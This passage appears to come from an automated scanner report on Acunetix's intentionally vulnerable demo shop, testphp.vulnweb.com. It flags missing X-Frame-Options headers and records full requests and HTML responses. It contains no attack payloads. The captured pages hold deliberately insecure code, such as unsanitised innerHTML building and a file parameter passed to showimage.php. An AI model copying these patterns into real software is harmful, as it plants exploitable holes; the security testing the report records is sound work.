href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/AJAX/index.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/AJAX/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4236 |
Response Body - size: 4,236 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>ajax test</title> <link href="styles.css" rel="stylesheet" type="text/css" /> <script type="text/javascript"> var httpreq = null; function SetContent(XML) { var items = XML.getElementsByTagName('items').item(0).getElementsByTagName('item'); var inner = '<ul>'; for(i=0; i<items.length; i++){ inner = inner + '<li><a href="javascript:getInfo(\'' + items[i].attributes.item(0).value + '\', \'' + items[i].attributes.item(1).value + '\')">' + items[i].firstChild.nodeValue + '</a></li>'; } inner = inner + '</ul>' cd = document.getElementById('contentDiv'); cd.innerHTML = inner; id = document.getElementById('infoDiv'); id.innerHTML = ''; } function httpCompleted() { if (httpreq.readyState==4 && httpreq.status==200) { SetContent(httpreq.responseXML); httpreq = null; } } function SetInfo(XML) { var ii = XML.getElementsByTagName('iteminfo').item(0); var inner = ''; inner = inner + '<p><strong>' + ii.getElementsByTagName('name').item(0).firstChild.nodeValue + '</strong></p>'; pict = ii.getElementsByTagName('picture'); if(pict.length>0){ inner = inner + '<img src="../showimage.php?file=' + pict.item(0).firstChild.nodeValue + '"/>'; } descs = ii.getElementsByTagName('description'); for (i=0; i<descs.length; i++){ inner = inner + '<p>' + descs.item(i).firstChild.nodeValue + '</p>'; } id = document.getElementById('infoDiv'); id.innerHTML = inner; } function httpInfoCompleted() { if (httpreq.readyState==4 && httpreq.status==200) { SetInfo(httpreq.responseXML); httpreq = null; } } function loadSomething(what) { getHttpRequest(); httpreq.open('GET', what, true); httpreq.send(''); } function getInfo(where, which) { getHttpRequest(); httpreq.onreadystatechange = httpInfoCompleted; if (where=='infotitle'){ httpreq.open('POST', where+'.php', true); httpreq.setRequestHeader('content-type', 'application/x-www-form-urlencoded'); httpreq.send('id='+which); } else { httpreq.open('GET', where+'.php?id='+which, true); httpreq.send(''); } } function xmlCompleted () { if (httpreq.readyState==4 && httpreq.status==200) { xd = document.getElementById('xmlDiv'); xd.innerHTML = httpreq.responseText; httpreq = null; } } function sendXML () { getHttpRequest(); httpreq.onreadystatechange = xmlCompleted; httpreq.open('POST', 'showxml.php'); httpreq.setRequestHeader('content-type', 'text/xml'); httpreq.send('<xml><node name="nodename1">nodetext1</node><node name="nodename2">nodetext2</node></xml>'); } function getHttpRequest() { // free the curent one if (httpreq!=null){ httpreq.abort(); httpreq = null; } if( window.XMLHttpRequest ) { httpreq = new XMLHttpRequest(); if (httpreq.overrideMimeType) { httpreq.overrideMimeType('text/xml'); } } else if(ActiveXObject) { httpreq = new ActiveXObject("Msxml2.XMLHTTP"); } httpreq.onreadystatechange = httpCompleted; } function SetMyCookie() { document.cookie = "mycookie=3"; alert('A cookie was set by JavaScript.'); } </script> </head> <body> <table border="0" cellpadding="3" width="500" align="center"> <tr> <td class="bordered"> <a href="javascript:loadSomething('artists.php');">artists</a> | <a href="javascript:loadSomething('categories.php');">categories</a> | <a href="#" onclick="loadSomething('titles.php')">titles</a> | <a href="#" onclick="sendXML()">send xml</a> | <a href="#" onclick="SetMyCookie()">setcookie</a> </td> </tr> <tr> <td> <div id="contentDiv"> </div> </td> </tr> <tr> <td> <div id="infoDiv"> </div> </td> </tr> <tr> <td> <div id="xmlDiv"> </div> </td> </tr> </table> </body> </html> |
URL | http://testphp.vulnweb.com/artists.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 262 bytes. |
GET http://testphp.vulnweb.com/artists.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5328 |
Response Body - size: 5,328 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class='story'><a href='artists.php?artist=1'><h3>r4w8173</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=2'><h3>Blad3</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=3'><h3>lyzae</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6251 |
Response Body - size: 6,251 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: r4w8173</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=1'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:56 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: Blad3</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=2'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: lyzae</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=3'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/cart.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 259 bytes. |
